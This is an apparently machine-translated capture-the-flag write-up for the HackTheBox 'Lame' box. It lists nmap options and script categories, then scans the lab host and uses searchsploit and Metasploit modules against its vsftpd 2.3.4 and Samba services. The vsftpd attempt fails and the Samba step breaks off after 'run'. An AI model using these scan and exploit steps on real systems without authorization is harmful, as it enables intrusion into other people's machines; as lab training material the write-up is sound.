HTB-Lame

nmap Common commands

1. nmap -iflist : Check the interface information and routing information of the local host

2. -A ： The option is used to scan in an offensive way

3.-T4： Specify the timing used in the scanning process , There is always 6 A level （0-5）, The higher the level , The faster the scan , But it's also easy to be firewall or IDS Detect and screen out , It is recommended to use... When the network communication is in good condition T4

4. -oX test.xml： Generate scan results test.xml file , If interrupted , The result is not to open

5. -oA test.xml: Generate scan results test.xml file , After interruption , The results can also be saved

6. -oG test.txt: Generate scan results test.txt file

7. -sn : Only host discovery , No port scan

8. -O : Appoint Nmap Scan the system version

9. -sV: Assign to Nmap Scan the service version

10. -p : Scan the specified port

11. -sS/sT/sA/sW/sM: Specify the use of TCP SYN/Connect()/ACK/Window/Maimonscans To scan the target host

12. -sU: Specify the use of UDP Scan mode to determine the target host's UDP Port status

13. -script

nmap -sT 192.168.52.141 scanning tcp port
-sU scanning udp port

nmap Script scan

Nmap Allow users to write their own scripts for automated scanning operations , Or expand Nmap Existing function scripts , The default directory for script placement is : /usr/share/nmap/scripts, It's probably close inside 600 Built in scripts with different categories and functions .Nmap The script functions of are mainly divided into the following categories ：

auth: Handle authentication certificate ( Bypass authentication ) Script for
broadcast: Probe more services on LAN , Such as dhcp/dns/sqlserver Etc
brute: Provide violence ** The way , For common applications such as http/snmp etc.
default: Use -sC or - A The default script for option bar tracing , Provides basic script scanning capabilities
discovery: More information about the Internet , Such as SMB enumeration 、SNMP Query etc.
dos: Used for denial of service attacks
exploit: Exploit known vulnerability to invade system
external: Using third party databases or resources , For example, to whois analysis
fuzzer: The script for the fuzzy test , Send abnormal package to target machine , Detect potential vulnerabilities
intrusive: Invasive scripts , Such scripts may bow | Send it to the other party IDS/IPS Recording or shielding of
malware: Detect if the target machine is infected with a virus 、 Open the back door and other information
safe: Such and intrusive contrary , Belongs to security script
version: Responsible for enhanced services and version scanning ( Version Detection ) Function script
vuln: Responsible for checking whether the target machine has common vulnerabilities ( Vulnerability ) , If there is MS08_ 067

1. Default script scan , It mainly scans the information of various application services .

nmap --script=default 192.168.52.141

2. Scan for common vulnerabilities .

nmap --script=vuln 192.168.52.141

Lame

First step ： Scan the network ```

nmap -sV -O -F --version-light 10.10.10.3
-sV： Probe open ports to determine Services / Version information
-O： Enable operating system detection
-F： Fast mode - Scan fewer ports than the default
–version-light： Limit the most likely detection （ Forced crossing 2）

See four open ports ：
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4 （ File transfer protocol FTP Control command ）
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) （ Safety enclosure SSH, Secure login , File transfer （scp,sftp） And port forwarding
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)（NetBIOS Session services ）
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) （Miscrosoft-DS（ A directory service ）SMB File sharing ）

The second step ： Vulnerable FTP

searchsploit Check vsftpd2.3.4 Are there any known vulnerabilities on ,searchsploit yes exploit database Command line search tool for

searchsploit vsftpd 2.3.4

We will use metasploit, This is a penetration testing framework , It is a necessary tool for attackers and defenders
use msfconsole Command start framework

search vsftpd 2.3.4 Use this command to find all useful payloads

We use this attack module
use exploit/unix/ftp/vsftpd_234_backdoor
Enable exploit , View the available options displayed

You can see the remote host (RHOSTS) Not set yet , We will set up the remote host and target , Because these two information are necessary for trial operation of vulnerability exploitation
We now set up the remote host
set RHOSTS 10.10.10.3

Set target to 0

run The attack

But it was found that no session was created , The vulnerability has been fixed as described in the vulnerability description
This module uses to add to VSFTPD Download the malicious backdoor in the archive . According to the latest information available , This back door is in 2011 year 6 month 30 solstice 2011 year 7 month 1 Date is introduced vsftpd-2.3.4.tar.gz The archive . The back door was opened on 2011 year 7 month 3 The sun is removed .

The third step ：samba

We need to find another way , The second cloth doesn't work
nmap -sV -sT -sC 10.10.10.3

searchsploit Samba 3.0.20

start-up msfconsole
searchsploit Samba 3.0.20

Start the attack module Show available options

Set up the remote host
set RHOSTS 10.10.10.3
run Start the attack module